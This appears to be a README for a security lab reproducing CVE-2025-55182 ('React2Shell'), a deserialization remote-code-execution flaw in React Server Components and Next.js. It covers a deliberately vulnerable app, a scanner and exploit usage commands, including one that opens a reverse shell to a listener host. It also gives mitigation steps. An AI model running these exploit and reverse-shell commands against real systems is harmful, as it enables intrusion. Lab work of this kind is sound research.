Share
## https://sploitus.com/exploit?id=953C5BFD-21F9-57EB-BB21-C33DB12B5F62
# CVE-2025-55182 (React2Shell) Vulnerability Analysis Lab

This repository contains a complete environment for analyzing and reproducing **CVE-2025-55182**, a critical Remote Code Execution (RCE) vulnerability in React Server Components (RSC) affecting React 19.x and Next.js 15.x.

**โš ๏ธ WARNING: This project intentionally contains vulnerable code. DO NOT deploy this to a public server or production environment.**

## ๐Ÿ” Vulnerability Overview

- **CVE ID:** CVE-2025-55182
- **Alias:** React2Shell
- **CVSS Score:** 10.0 (CRITICAL)
- **Vulnerability Type:** CWE-502 (Deserialization of Untrusted Data)
- **Affected Components:**
  - React Server Components (19.0.0 - 19.2.0)
  - Next.js (15.0.0 - 16.0.7)
  - `react-server-dom-webpack`, `react-server-dom-turbopack`

### Mechanism
The vulnerability exists in how the React Server Components runtime processes serialized data from HTTP requests (Server Actions). An attacker can craft a malicious "Flight" protocol payload that, when deserialized by the server, executes arbitrary code before authentication checks occur.

## ๐Ÿ“‚ Project Structure

```
react2shell/
โ”œโ”€โ”€ vulnerable-app/       # Vulnerable Next.js 15 application
โ”‚   โ”œโ”€โ”€ app/
โ”‚   โ”‚   โ”œโ”€โ”€ actions.ts    # Vulnerable Server Actions
โ”‚   โ”‚   โ””โ”€โ”€ page.tsx      # UI for testing vulnerability
โ”‚   โ”œโ”€โ”€ Dockerfile        # Container definition
โ”‚   โ””โ”€โ”€ package.json
โ”œโ”€โ”€ exploit/              # Exploit tools
โ”‚   โ”œโ”€โ”€ exploit.py        # Python PoC exploit
โ”‚   โ”œโ”€โ”€ scanner.py        # Vulnerability scanner
โ”‚   โ””โ”€โ”€ quick_exploit.sh  # Simple bash exploit
โ”œโ”€โ”€ docs/                 # Analysis documentation
โ””โ”€โ”€ docker-compose.yml    # Isolated lab environment
```

## ๐Ÿš€ Getting Started

### Prerequisites
- Docker & Docker Compose
- Python 3.x (for running exploits locally)

### 1. Start the Lab Environment

Run the vulnerable application in an isolated container:

```bash
docker-compose up -d --build
```

The application will be available at `http://localhost:3000`.

### 2. Verify the Application

Visit `http://localhost:3000` in your browser. You should see the "React2Shell Lab" interface with several testing panels:
- **Command Execution:** Test direct command injection
- **Unsafe Deserialization:** Test JSON-based deserialization exploits
- **Arbitrary File Read:** Test path traversal
- **System Info:** View system details (to verify RCE impact)

## โš”๏ธ Exploitation

We provide several tools to test the vulnerability.

### Using the Python Exploit

1. Install requirements:
   ```bash
   pip install -r exploit/requirements.txt
   ```

2. Check if vulnerable:
   ```bash
   python3 exploit/exploit.py -u http://localhost:3000 --check
   ```

3. Execute a command:
   ```bash
   python3 exploit/exploit.py -u http://localhost:3000 -c "id"
   ```

4. Reverse Shell (requires a listener, e.g., `nc -lvnp 4444`):
   ```bash
   python3 exploit/exploit.py -u http://localhost:3000 --revshell -l HOST_IP -p 4444
   ```

### Using the Scanner

Scan for vulnerable React/Next.js instances:

```bash
python3 exploit/scanner.py -u http://localhost:3000
```

## ๐Ÿ›ก๏ธ Mitigation

To fix this vulnerability in your own applications:

1. **Upgrade Dependencies:**
   - Upgrade React to version **19.3.0** or later.
   - Upgrade Next.js to version **15.0.5**, **15.1.9**, or **16.0.8** depending on your branch.

2. **Verify Patch:**
   Check `package.json` to ensure `react-server-dom-*` packages are updated.

## ๐Ÿ“ Disclaimer

This project is for educational purposes and security research only. The authors take no responsibility for the misuse of this material.